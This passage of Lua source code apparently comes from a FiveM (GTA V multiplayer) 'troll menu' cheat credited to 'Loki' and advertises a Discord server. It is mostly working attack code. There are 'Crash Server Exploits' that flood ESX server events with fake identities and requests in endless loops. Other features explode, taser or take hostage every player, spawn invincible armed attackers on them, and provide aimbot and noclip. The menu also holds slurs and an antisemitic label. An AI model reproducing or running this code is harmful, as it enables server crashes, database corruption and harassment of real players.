NetToPed(au) GiveWeaponToPed(at, GetHashKey(ar), 9999, 1, 1) SetEntityInvincible(at, true) SetPedCanSwitchWeapon(at, true) TaskCombatPed(at, GetPlayerPed(af), 0, 16) else Citizen.Wait(0) end end ) end else LeBoyorFDPdrawNotification("~h~~b~Vehicle Model is invalid") end end function LeBoyorFDPSpawnProp(av) if IsModelValid(av) then for W, af in ipairs(GetActivePlayers()) do if IsPedInAnyVehicle(GetPlayerPed(af), true) then local aw = GetHashKey(av) while not HasModelLoaded(aw) do Citizen.Wait(0) RequestModel(aw) end local ax = CreateObject(aw, 0, 0, 0, true, false, true) NetworkSetEntityInvisibleToNetwork(ax, true) AttachEntityToEntity( ax, GetVehiclePedIsIn(GetPlayerPed(af), false), GetEntityBoneIndexByName(GetVehiclePedIsIn(GetPlayerPed(af), false), "chassis"), 0, 0, -1.0, 0.0, 0.0, 0, true, true, false, true, 1, true ) else local aw = GetHashKey(av) while not HasModelLoaded(aw) do Citizen.Wait(0) RequestModel(aw) end local ax = CreateObjectNoOffset(aw, 0, 0, 0, true, false, true) NetworkSetEntityInvisibleToNetwork(ax, true) AttachEntityToEntity( ax, GetPlayerPed(af), GetPedBoneIndex(GetPlayerPed(af), 0), 0, 0, 0, 0.0, 90, 0, true, true, false, true, 1, true ) end end else LeBoyorFDPdrawNotification("~h~~b~Prop Model is invalid") end end function LeBoyorFDPSpawnVehicle(ay) if IsModelValid(ay) then for W, af in ipairs(GetActivePlayers()) do local az = GetHashKey(ay) while not HasModelLoaded(az) do Citizen.Wait(0) RequestModel(az) end local al = GetEntityCoords(GetPlayerPed(af)) local veh = CreateVehicle(az, al.x, al.y, al.z, 0, 1, 1) NetworkSetEntityInvisibleToNetwork(veh, true) end else LeBoyorFDPdrawNotification("~h~~b~Vehicle Model is invalid") end end function LeBoyorFDPSpawnPed(aA) if IsModelValid(aA) then local aB = "weapon_minigun" for W, af in ipairs(GetActivePlayers()) do local aC = GetHashKey(aA) local aD = GetEntityCoords(GetPlayerPed(af)) RequestModel(aC) Citizen.Wait(50) if HasModelLoaded(aC) then local aA = CreatePed(21, aC, aD.x - 1, aD.y, aD.z, 0, true, true) local aE = CreatePed(21, aC, aD.x + 1, aD.y, aD.z, 0, true, true) local aF = CreatePed(21, aC, aD.x, aD.y - 1, aD.z, 0, true, true) local aG = CreatePed(21, aC, aD.x, aD.y + 1, aD.z, 0, true, true) NetworkSetEntityInvisibleToNetwork(aA, true) NetworkSetEntityInvisibleToNetwork(aE, true) NetworkSetEntityInvisibleToNetwork(aF, true) NetworkSetEntityInvisibleToNetwork(aG, true) NetworkRegisterEntityAsNetworked(aA) if DoesEntityExist(aA) and DoesEntityExist(aE) and DoesEntityExist(aF) and DoesEntityExist(aG) and not IsEntityDead(GetPlayerPed(af)) then SetEntityInvincible(aA, true) SetEntityInvincible(aE, true) SetEntityInvincible(aF, true) SetEntityInvincible(aG, true) local aH = PedToNet(aA) PedToNet(aE) PedToNet(aF) PedToNet(aG) NetworkSetNetworkIdDynamic(aH, fz5f46zfss) SetNetworkIdCanMigrate(aH, true) SetNetworkIdExistsOnAllMachines(aH, true) GiveWeaponToPed(aA, GetHashKey("weapon_rpg"), 9999, 1, 1) GiveWeaponToPed(aE, GetHashKey("weapon_rpg"), 9999, 1, 1) GiveWeaponToPed(aF, GetHashKey("weapon_rpg"), 9999, 1, 1) GiveWeaponToPed(aG, GetHashKey("weapon_rpg"), 9999, 1, 1) SetPlayerWeaponDamageModifier(aA, 999999999999999) SetPlayerWeaponDamageModifier(aE, 999999999999999) SetPlayerWeaponDamageModifier(aF, 999999999999999) SetPlayerWeaponDamageModifier(aG, 999999999999999) SetPedCanSwitchWeapon(aA, true) NetToPed(aH) TaskCombatPed(aA, GetPlayerPed(af), 0, 16) TaskCombatPed(aE, GetPlayerPed(af), 0, 16) TaskCombatPed(aF, GetPlayerPed(af), 0, 16) TaskCombatPed(aG, GetPlayerPed(af), 0, 16) elseif IsEntityDead(GetPlayerPed(af)) then TaskCombatHatedTargetsInArea(aA, aD.x, aD.y, aD.z, 500) TaskCombatHatedTargetsInArea(pe2, aD.x, aD.y, aD.z, 500) TaskCombatHatedTargetsInArea(aF, aD.x, aD.y, aD.z, 500) TaskCombatHatedTargetsInArea(aG, aD.x, aD.y, aD.z, 500) else Citizen.Wait(0) end end end else LeBoyorFDPdrawNotification("~h~~b~Ped Model is invalid") end end local aI = { "WEAPON_UNARMED", "WEAPON_KNIFE", "WEAPON_HATCHET", "WEAPON_PISTOL", "WEAPON_COMBATPISTOL", "WEAPON_PISTOL50", "WEAPON_STUNGUN", "WEAPON_MICROSMG", "WEAPON_ASSAULTRIFLE", "WEAPON_CARBINERIFLE", "WEAPON_COMPACTRIFLE" } local aJ = { "WEAPON_UNARMED", "WEAPON_KNIFE", "WEAPON_KNUCKLE", "WEAPON_NIGHTSTICK", "WEAPON_HAMMER", "WEAPON_BAT", "WEAPON_GOLFCLUB", "WEAPON_CROWBAR", "WEAPON_BOTTLE", "WEAPON_DAGGER", "WEAPON_HATCHET", "WEAPON_MACHETE", "WEAPON_FLASHLIGHT", "WEAPON_SWITCHBLADE", "WEAPON_POOLCUE", "WEAPON_PIPEWRENCH", "WEAPON_GRENADE", "WEAPON_STICKYBOMB", "WEAPON_PROXMINE", "WEAPON_BZGAS", "WEAPON_SMOKEGRENADE", "WEAPON_MOLOTOV", "WEAPON_FIREEXTINGUISHER", "WEAPON_PETROLCAN", "WEAPON_SNOWBALL", "WEAPON_FLARE", "WEAPON_BALL", "WEAPON_PISTOL", "WEAPON_PISTOL_MK2", "WEAPON_COMBATPISTOL", "WEAPON_APPISTOL", "WEAPON_REVOLVER", "WEAPON_REVOLVER_MK2", "WEAPON_DOUBLEACTION", "WEAPON_PISTOL50", "WEAPON_SNSPISTOL", "WEAPON_SNSPISTOL_MK2", "WEAPON_HEAVYPISTOL", "WEAPON_VINTAGEPISTOL", "WEAPON_STUNGUN", "WEAPON_FLAREGUN", "WEAPON_MARKSMANPISTOL", "WEAPON_RAYPISTOL", "WEAPON_MICROSMG", "WEAPON_MINISMG", "WEAPON_SMG", "WEAPON_SMG_MK2", "WEAPON_ASSAULTSMG", "WEAPON_COMBATPDW", "WEAPON_GUSENBERG", "WEAPON_MACHINEPISTOL", "WEAPON_MG", "WEAPON_COMBATMG", "WEAPON_COMBATMG_MK2", "WEAPON_RAYCARBINE", "WEAPON_ASSAULTRIFLE", "WEAPON_ASSAULTRIFLE_MK2", "WEAPON_CARBINERIFLE", "WEAPON_CARBINERIFLE_MK2", "WEAPON_ADVANCEDRIFLE", "WEAPON_SPECIALCARBINE", "WEAPON_SPECIALCARBINE_MK2", "WEAPON_BULLPUPRIFLE", "WEAPON_BULLPUPRIFLE_MK2", "WEAPON_COMPACTRIFLE", "WEAPON_PUMPSHOTGUN", "WEAPON_PUMPSHOTGUN_MK2", "WEAPON_SWEEPERSHOTGUN", "WEAPON_SAWNOFFSHOTGUN", "WEAPON_BULLPUPSHOTGUN", "WEAPON_ASSAULTSHOTGUN", "WEAPON_MUSKET", "WEAPON_HEAVYSHOTGUN", "WEAPON_DBSHOTGUN", "WEAPON_SNIPERRIFLE", "WEAPON_HEAVYSNIPER", "WEAPON_HEAVYSNIPER_MK2", "WEAPON_MARKSMANRIFLE", "WEAPON_MARKSMANRIFLE_MK2", "WEAPON_GRENADELAUNCHER", "WEAPON_GRENADELAUNCHER_SMOKE", "WEAPON_RPG", "WEAPON_MINIGUN", "WEAPON_FIREWORK", "WEAPON_RAILGUN", "WEAPON_HOMINGLAUNCHER", "WEAPON_COMPACTLAUNCHER", "WEAPON_RAYMINIGUN" } function LOKIGiveAllWeapons(aK) local aA = GetPlayerPed(aK) for af = 0, #aI do Citizen.InvokeNative(0xBF0FD6E56C964FCB, aA, GetHashKey(aI[af]), 9999, false, false) end end function LOKIGiveAllPlayersWeapons() for W, af in ipairs(GetActivePlayers()) do LOKIGiveAllWeapons(af) end end function LOKIRemoveAllWeapons(aK) local aA = GetPlayerPed(aK) for af = 0, #aJ do Citizen.InvokeNative(0x4899CB088EDF59B8, aA, GetHashKey(aJ[af])) end end function LOKIRemoveAllPlayersWeapons() for W, af in ipairs(GetActivePlayers()) do LOKIRemoveAllWeapons(af) end end function LOKImessageply(aK) local aA = GetPlayerServerId(aK) TriggerServerEvent("esx_policejob:message", aA, "BEST Free Lua Exec > \n~b~discord.gg/LokiExec") end function LOKIMessageAllPlayers() for W, af in ipairs(GetActivePlayers()) do LOKImessageply(af) end end function LOKITazPlayers(aK) local aA = GetPlayerPed(aK) if IsPedInAnyVehicle(aA, true) then ClearPedTasksImmediately(aA) end local aL = GetPedBoneCoords(aA, SKEL_ROOT, 0, 0, 0) local aM = GetPedBoneCoords(aA, SKEL_R_Hand, 0, 0, 0.2) local aN = GetHashKey("WEAPON_STUNGUN") ShootSingleBulletBetweenCoords(aL.x, aL.y, aL.z, aM.x, aM.y, aM.z, 1, 0, aN, PlayerPedId(), false, false, 1) end function LOKITazAllPlayers() for W, af in ipairs(GetActivePlayers()) do LOKITazPlayers(af) end end function LOKIKickFromVeh(aK) local aA = GetPlayerPed(aK) Citizen.InvokeNative(0xAAA34F8A7CB32098, aA) end function LOKIKickAllFromVeh() for W, af in ipairs(GetActivePlayers()) do LOKIKickFromVeh(af) end end function LOKIExplodePlayer(aK) local aA = GetPlayerPed(aK) local al = GetEntityCoords(aA) AddExplosion(al.x, al.y, al.z, 7, 100000.0, true, false, 0) end function LOKIExploseAllPlayers() for W, af in ipairs(GetActivePlayers()) do LOKIExplodePlayer(af) end end function LeBoyorFDPdrawNotification(y) SetNotificationTextEntry("STRING") AddTextComponentString(y) DrawNotification(false, false) end local aO, aP, aQ, aR, aS, aT, aU = Citizen, msgpack, math, string, table, TriggerLatentServerEventInternal, TriggerServerEventInternal local aV = {} local aW = {} local aX = {} local aY = {UseSpace = true, Letters = 3, Numbers = 3} for af = 48, 57 do aS.insert(aV, aR.char(af)) end for af = 65, 90 do aS.insert(aV, aR.char(af)) end for af = 97, 122 do aS.insert(aV, aR.char(af)) end for af = 48, 57 do aS.insert(aW, aR.char(af)) end for af = 65, 90 do aS.insert(aX, aR.char(af)) end for af = 97, 122 do aS.insert(aX, aR.char(af)) end local function aZ() local a_ = aQ.random(1, 2) if a_ == 1 then return "m" else return "f" end end local function b0(b1) if b1 > 0 then return b0(b1 - 1) .. aV[aQ.random(1, #aV)] end return "" end local function b2(b1) if b1 > 0 then return b2(b1 - 1) .. aW[aQ.random(1, #aW)] end return "" end local function b3(b1) if b1 > 0 then return b3(b1 - 1) .. aX[aQ.random(1, #aX)] end return "" end local function b4() if aY.UseSpace then return aR.upper(b3(aY.Letters) .. " " .. b2(aY.Numbers)) end return aR.upper(b3(aY.Letters) .. b2(aY.Numbers)) end local function b5() return "06" .. tostring(aQ.random(11111111, 99999999)) end local function b6(b7, b8, ...) local b9 = aP.pack({...}) aT(b7, b9, aR.len(b9), tonumber(b8)) end local function ba(b7, ...) local b9 = aP.pack({...}) aU(b7, b9, aR.len(b9)) end local function bb(b8) local bc = {playerid = -1, identifier = "license:" .. b0(40)} b6( "esx_identity:setIdentity", b8, { firstname = b0(6), lastname = b0(6), dateofbirth = tostring(aQ.random(1, 31)) .. "/" .. tostring(aQ.random(1, 12)) .. "/" .. tostring(aQ.random(1950, 2010)), sex = aZ(), height = aQ.random(150, 190) }, bc ) end local function bd(b8) b6("esx:triggerServerCallback", b8, "esx_vehicleshop:isPlateTaken", 1, b4()) end local function be(b8) b6("esx_cartesim:sim_delete", b8, b5()) end Citizen.CreateThread( function() local bf = 1 local bg = 1 LeBoyorFDPCreateMenu("MainMenu", "Menu Troll By Loki") LeBoyorFDPCreateSubMenu("AllPlayersMenu", "MainMenu", "") LeBoyorFDPCreateSubMenu("CrashExploits", "MainMenu", "") LeBoyorFDPCreateSubMenu("SpawnProp", "AllPlayersMenu", "") LeBoyorFDPCreateSubMenu("SpawnVehicle", "AllPlayersMenu", "") LeBoyorFDPCreateSubMenu("SpawnPed", "AllPlayersMenu", "") LeBoyorFDPCreateSubMenu("SpawnFireVehicles", "AllPlayersMenu", "") allMenus = { "MainMenu", "AllPlayersMenu", "SpawnProp", "SpawnVehicle", "SpawnPed", "SpawnFireVehicles", "CrashExploits" } while a do if LeBoyorFDPIsMenuOpened("MainMenu") then LeBoyorFDPSetSubTitle("MainMenu", GetCurrentServerEndpoint()) if LeBoyorFDPMenuButton("~b~→~s~ All Players Menu", "AllPlayersMenu") then elseif LeBoyorFDPMenuButton("~b~→~s~ Crash Server Exploits", "CrashExploits") then elseif LeBoyorFDPButton("~b~→~s~ Revive Myself") then local al = GetEntityCoords(GetPlayerPed(-1)) StopScreenEffect("DeathFailOut") SetEntityHealth(PlayerPedId(-1), 200) ClearPedBloodDamage(GetPlayerPed(-1)) SetEntityCoordsNoOffset(PlayerPedId(), al.x, al.y, al.z, false, false, false, true) NetworkResurrectLocalPlayer(al.x, al.y, al.z, false, true, false) TriggerServerEvent("esx:onPlayerSpawn") TriggerEvent("esx:onPlayerSpawn") TriggerEvent("playerSpawned") elseif LeBoyorFDPButton("NoClip") then ToggleNoclippp() elseif LeBoyorFDPButton("AimBot") then ToggleAimbottpp() elseif LeBoyorFDPButton("~b~→~s~ Close the menu") then a = false end LeBoyorFDPDisplay() elseif LeBoyorFDPIsMenuOpened("AllPlayersMenu") then if LeBoyorFDPMenuButton("~b~→~s~ Spawn Prop", "SpawnProp") then elseif LeBoyorFDPMenuButton("~b~→~s~ Spawn Vehicle", "SpawnVehicle") then elseif LeBoyorFDPMenuButton("~b~→~s~ Spawn Ped", "SpawnPed") then elseif LeBoyorFDPMenuButton("~b~→~s~ Spawn Shooting Vehicle", "SpawnFireVehicles") then elseif LeBoyorFDPButton("~s~ Give All Players Weapons") then LOKIGiveAllPlayersWeapons() elseif LeBoyorFDPButton("~s~ Remove All Players Weapons") then LOKIRemoveAllPlayersWeapons() elseif LeBoyorFDPButton("~s~ Remove From Cars") then LOKIKickAllFromVeh() elseif LeBoyorFDPButton("~s~ Taz All Players") then LOKITazAllPlayers() elseif LeBoyorFDPButton("~s~ Send Message to All Players") then LOKIMessageAllPlayers() elseif LeBoyorFDPButton("~s~ Explose All Players") then LOKIExploseAllPlayers() elseif LeBoyorFDPButton("~s~ Take Hostage All Players") then local bh = "anim@gangops@hostage@" local bi = "perp_idle" local bj = "anim@gangops@hostage@" local bk = "victim_idle" for W, af in ipairs(GetActivePlayers()) do TriggerServerEvent( "cmg3_animations:sync", GetPlayerPed(-1), bh, bj, bi, bk, 0.11, -0.24, 0.0, GetPlayerServerId(af), 100000, 0.0, 49, 49, 50, true ) Wait(1000) end elseif LeBoyorFDPButton("~s~ Carry All Players") then local bh = "anim@arena@celeb@flat@paired@no_props@" local bi = "piggyback_c_player_a" local bk = "piggyback_c_player_b" for W, af in ipairs(GetActivePlayers()) do TriggerServerEvent( "::{korioz#0110}::cmg2_animations:sync", GetPlayerPed(-1), bh, bi, bk, 0.15, -0.24, 0.0, GetPlayerServerId(af), 100000, 0.0, 49, 33, 1 ) Wait(1000) end end LeBoyorFDPDisplay() elseif LeBoyorFDPIsMenuOpened("CrashExploits") then if LeBoyorFDPButton("~s~ Crash Exploit 1") then local b8 = 500 while true do for af = 1, 150, 1 do bb(b8) end aO.Wait(100) end elseif LeBoyorFDPButton("~s~ Crash Exploit 2") then local b8 = 2000 while true do for af = 1, 150, 1 do bd(b8) end aO.Wait(100) end elseif LeBoyorFDPButton("~s~ Crash Exploit 3") then local b8 = 2000 while true do for af = 1, 150, 1 do be(b8) end aO.Wait(100) end end LeBoyorFDPDisplay() elseif LeBoyorFDPIsMenuOpened("SpawnProp") then if LeBoyorFDPButton("~s~ UFO") then LeBoyorFDPSpawnProp("p_spinning_anus_s") elseif LeBoyorFDPButton("~s~ Hamburgher") then LeBoyorFDPSpawnProp("xs_prop_hamburgher_wl") elseif LeBoyorFDPButton("~s~ Tube") then LeBoyorFDPSpawnProp("stt_prop_stunt_tube_l") elseif LeBoyorFDPButton("~s~ Ramp") then LeBoyorFDPSpawnProp("stt_prop_stunt_jump45") elseif LeBoyorFDPButton("~s~ Random Prop") then LeBoyorFDPRandomProp() elseif LeBoyorFDPButton("~s~ Custom Prop") then customprop = LeBoyorFDPDisplayBox("Enter a Prop name", "", 100) LeBoyorFDPSpawnProp(customprop) end LeBoyorFDPDisplay() elseif LeBoyorFDPIsMenuOpened("SpawnVehicle") then if LeBoyorFDPButton("~s~ Boat") then LeBoyorFDPSpawnVehicle("tug") elseif LeBoyorFDPButton("~s~ Bus") then LeBoyorFDPSpawnVehicle("bus") elseif LeBoyorFDPButton("~s~ AirPlane") then LeBoyorFDPSpawnVehicle("strikeforce") elseif LeBoyorFDPButton("~s~ Helicopter") then LeBoyorFDPSpawnVehicle("buzzard2") elseif LeBoyorFDPButton("~s~ Insurgent") then LeBoyorFDPSpawnVehicle("insurgent2") elseif LeBoyorFDPButton("~s~ Bulldozer") then LeBoyorFDPSpawnVehicle("bulldozer") elseif LeBoyorFDPButton("~s~ Custom Vehicle") then customprop = LeBoyorFDPDisplayBox("Enter a Vehicle name", "", 100) LeBoyorFDPSpawnVehicle(customprop) end LeBoyorFDPDisplay() elseif LeBoyorFDPIsMenuOpened("SpawnPed") then if LeBoyorFDPButton("~s~ Ban ALL") then LeBoyorFDPSpawnPed("a_m_y_skater_01") elseif LeBoyorFDPButton("~s~ Gorilla") then LeBoyorFDPSpawnPed("ig_orleans") elseif LeBoyorFDPButton("~s~ Rabbi Jacob") then LeBoyorFDPSpawnPed("a_m_m_hasjew_01") elseif LeBoyorFDPButton("~s~ Custom Ped") then customprop = LeBoyorFDPDisplayBox("Enter a Ped Name", "", 100) LeBoyorFDPSpawnPed(customprop) end LeBoyorFDPDisplay() elseif LeBoyorFDPIsMenuOpened("SpawnFireVehicles") then if LeBoyorFDPButton("~s~ Helicopters") then LOKISpawnAllFireVehicle("buzzard") elseif LeBoyorFDPButton("~s~ Plane") then LOKISpawnAllFireVehicle("strikeforce") elseif LeBoyorFDPButton("~s~ Insurgent") then LOKISpawnAllFireVehicle("insurgent3") elseif LeBoyorFDPButton("~s~ Turret") then LOKISpawnAllFireVehicle("trailersmall2") elseif LeBoyorFDPButton("~s~ Custom Vehicle") then veh = LeBoyorFDPDisplayBox("Enter a Vehicle Name", "", 100) LOKISpawnAllFireVehicle(veh) end LeBoyorFDPDisplay() elseif IsDisabledControlJustPressed(0, 314) then local bl = jtmmoiaussibb("Enter the password", "", 100) if bl == "loki" then LeBoyorFDPOpenMenu("MainMenu") LeBoyorFDPdrawNotification("~h~~b~Successfully Opened !") LeBoyorFDPdrawNotification("~h~~b~Made by LokiModz.lua#0001") LeBoyorFDPdrawNotification("~h~~b~discord.gg/lokiexec") else LeBoyorFDPdrawNotification("~h~~R~Fucking Retard!") end end Citizen.Wait(0) end end ) Citizen.CreateThread( function() while true do Citizen.Wait(0) local C = LeBoyorFDPRGBRainbow(1) for af = 0, #allMenus do LeBoyorFDPSetSpriteColor(allMenus[af], C.r, C.g, C.b, 255) end end end ) local bm = {} Citizen.CreateThread( function() while a do Citizen.Wait(0) local C = LeBoyorFDPRGBRainbow(60) local bn = GetEntityCoords(PlayerPedId(), false) for W, bo in pairs(GetActivePlayers()) do local bp = GetPlayerPed(bo) if #(bn - GetEntityCoords(bp, false)) < 250.0 then bm[bo] = CreateFakeMpGamerTag( bp, " [" .. GetPlayerServerId(bo) .. "] " .. GetPlayerName(bo) .. "(" .. GetEntityHealth(bp) .. " PV)", false, false, "", 0 ) SetMpGamerTagVisibility(bm[bo], 2, true) SetMpGamerTagHealthBarColour(bm[bo], 50) SetMpGamerTagColour(bm[bo], 0, C.r) SetMpGamerTagName( bm[bo], " [" .. GetPlayerServerId(bo) .. "] " .. GetPlayerName(bo) .. "(" .. GetEntityHealth(bp) .. "PV)" ) if NetworkIsPlayerTalking(bo) then SetMpGamerTagVisibility(bm[bo], 4, 1) else SetMpGamerTagVisibility(bm[bo], 4, 0) end else RemoveMpGamerTag(bm[bo]) bm[bo] = nil end end end end ) Citizen.CreateThread( function() LeBoyorFDPdrawNotification("~h~~b~Loki Troll Menu") LeBoyorFDPdrawNotification("~h~~b~Press NUMPAD+ to open") LeBoyorFDPdrawNotification("~h~~b~Discord.gg/lokiexec") LeBoyorFDPdrawNotification("~h~~b~YT/LokiModz") DisplayRadar(true) end ) local bq = false local br = 2.0 function ToggleNoclippp() br = 2.0 bq = not bq if bq then Citizen.CreateThread( function() while bq do Wait(1) local bn = GetEntityCoords(PlayerPedId(), false) local bs = getCamDirectiondd() SetEntityVelocity(PlayerPedId(), 0.01, 0.01, 0.01) SetEntityCollision(PlayerPedId(), 0, 1) if IsControlPressed(0, 32) then bn = bn + br * bs end if IsControlPressed(0, 269) then bn = bn - br * bs end if IsDisabledControlJustPressed(1, 15) then br = br + 0.1 end if IsDisabledControlJustPressed(1, 14) then br = br - 0.1 if br < 0 then br = 0 end end SetEntityCoordsNoOffset(PlayerPedId(), bn, true, true, true) SetEntityVisible(PlayerPedId(), 0, 0) end SetEntityVisible(PlayerPedId(), 1, 0) SetEntityCollision(PlayerPedId(), 1, 1) end ) end end function AddVectorsddd(bt, bu) return vector3(bt.x + bu.x, bt.y + bu.y, bt.z + bu.z) end function ShootAt2sddd(aK, bv, bw) local bx = GetPedBoneCoords(aK, GetEntityBoneIndexByName(aK, bv), 0.0, 0.0, 0.0) local W, aN = GetCurrentPedWeapon(PlayerPedId()) ShootSingleBulletBetweenCoords( AddVectorsddd(bx, vector3(0, 0, 0.1)), bx, bw, true, aN, PlayerPedId(), true, false, 0.3 ) end function ShootAimbotff(by) if IsEntityOnScreen(by) and HasEntityClearLosToEntityInFront(PlayerPedId(), by) and not IsPedDeadOrDying(by) and IsDisabledControlPressed(0, 24) and IsPlayerFreeAiming(PlayerId()) then local z, A, bz = table.unpack(GetEntityCoords(by)) local W, bA, bB = World3dToScreen2d(z, A, bz) if bA > 0.25 and bA < 0.75 and bB > 0.25 and bB < 0.75 then local bC, aN = GetCurrentPedWeapon(PlayerPedId()) ShootAt2sddd(by, "SKEL_HEAD", GetWeaponDamage(aN, 1)) end end end function DoLines(af) local bD, bE, bF = table.unpack(GetEntityCoords(PlayerPedId(-1))) local bG, bH, bI = table.unpack(GetEntityCoords(af)) DrawLine(bD, bE, bF, bG, bH, bI, 243, 7, 243, 255) end function ToggleAimbottpp() Citizen.CreateThread( function() GiveWeaponToPed(GetPlayerPed(-1), GetHashKey("WEAPON_COMBATPISTOL"), 250, 1, 1) while true do Citizen.Wait(1) for W, af in ipairs(GetActivePlayers()) do ShootAimbotff(GetPlayerPed(af)) DoLines(GetPlayerPed(af)) end end end ) end function getCamDirectiondd() local bJ = GetGameplayCamRelativeHeading() + GetEntityHeading(PlayerPedId()) local bK = GetGameplayCamRelativePitch() local al = vector3(-math.sin(bJ * math.pi / 180.0), math.cos(bJ * math.pi / 180.0), math.sin(bK * math.pi / 180.0)) local bL = math.sqrt(al.x * al.x + al.y * al.y + al.z * al.z) if bL ~= 0 then al = al / bL end return al end function jtmmoiaussibb(bM, bN, bO) AddTextEntry("FMMC_KEY_TIP9N", bM .. ":") DisplayOnscreenKeyboard(1, "FMMC_KEY_TIP9N", "", bN, "", "", "", bO) a78d8d85dssss = waduyh487r64ss while UpdateOnscreenKeyboard() ~= 1 and UpdateOnscreenKeyboard() ~= 2 do Citizen.Wait(0) end if UpdateOnscreenKeyboard() ~= 2 then local ad = GetOnscreenKeyboardResult() Citizen.Wait(500) return ad else Citizen.Wait(500) return false end end